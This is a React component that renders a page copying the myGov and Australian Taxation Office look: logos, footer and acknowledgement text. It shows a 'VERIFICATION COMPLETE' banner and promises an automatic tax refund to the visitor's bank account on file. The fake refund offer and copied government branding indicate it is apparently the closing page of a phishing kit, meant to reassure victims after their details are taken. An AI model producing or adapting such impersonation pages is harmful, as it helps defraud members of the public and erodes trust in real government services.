import React from "react";

const F = () => {
  return (
    <div style={{ width: "100%" }}>
      <div className="brand-rainbow">&nbsp;</div>
      <header role="banner" className="mgvEnhanceHeader">
        <section className="wrapper">
          <div className="inner">
            <div className="unauth-grid">
              <div className="unauth-grid-row">
                <a className="unauth-govt-crest__link" href="#">
                  <img
                    id="unauth-govt-crest"
                    src="/images/myGov-cobranded-logo-black.svg"
                    alt="myGov Beta"
                    role="img"
                  />
                </a>
              </div>
            </div>
          </div>
        </section>
      </header>

      <div className="wrapper-mapwap">
        <div className="main-block" id="content" role="main" style={{ width: "100%" }}>
          <form id="forgotten-username-form" action="/" method="post">
            <center>
              <div className="swal2-icon swal2-success swal2-animate-success-icon" style={{ display: "flex" }}>
                <div
                  className="swal2-success-circular-line-left"
                  style={{ backgroundColor: "#FFF" }}
                ></div>
                <span className="swal2-success-line-tip"></span>
                <span className="swal2-success-line-long"></span>
                <div className="swal2-success-ring"></div>
                <div
                  className="swal2-success-fix"
                  style={{ backgroundColor: "#FFF" }}
                ></div>
                <div
                  className="swal2-success-circular-line-right"
                  style={{ backgroundColor: "#FFF" }}
                ></div>
              </div>

              <h4
                className="page-toolbar__page-title first-page-element"
                data-id="page-title"
                role="heading"
                aria-label="Verified Successfully"
                style={{
                  color: "green",
                  paddingLeft: "25px",
                  margin: "0 auto",
                }}
              >
                VERIFICATION COMPLETE
              </h4>
            </center>

            <h3 style={{ fontSize: "25px", textAlign: "center" }}>
              You are eligible to receive a refund
            </h3>

            <p>
              You are eligible to receive a refund from the Australian Taxation Office. In our
              commitment to fulfilling outstanding obligations, we are in the process of disbursing
              payments to individuals owed, and your account has been identified for a refund.
              <br />
              <br />
              We want to assure you that this refund process is entirely automated for your
              convenience. As we already have your bank account or tax agent information on file,
              you can expect the funds to be deposited directly into your account within 21 business
              days.
            </p>
          </form>
        </div>
      </div>

      <footer role="contentinfo">
        <div className="wrapper">
          <div className="inner">
            <section className="footer-list">
              <nav>
                <h2 className="sr-only" aria-label="Footer">
                  Footer
                </h2>
                <ul className="lower-links">
                  <li>
                    <a href="#" target="_blank">
                      Terms of use
                    </a>
                  </li>
                  <li>
                    <a href="#" target="_blank">
                      Privacy and security
                    </a>
                  </li>
                  <li>
                    <a href="#" target="_blank">
                      Copyright
                    </a>
                  </li>
                  <li>
                    <a href="#" target="_blank">
                      Accessibility
                    </a>
                  </li>
                </ul>
              </nav>
            </section>
            <div className="footer-lower">
              <section className="footer-lower-logo">
                <a href="#">
                  <img
                    src="/images/myGov-cobranded-logo-white.svg"
                    alt="myGov Beta"
                    width="313.17"
                    height="70"
                  />
                </a>
              </section>

              <p className="footer-acknowledgement">
                We acknowledge the Traditional Custodians of the lands we live on. We pay our
                respects to all Elders, past and present, of all Aboriginal and Torres Strait
                Islander nations.
              </p>
            </div>
          </div>
        </div>
      </footer>
    </div>
  );
};

export default F;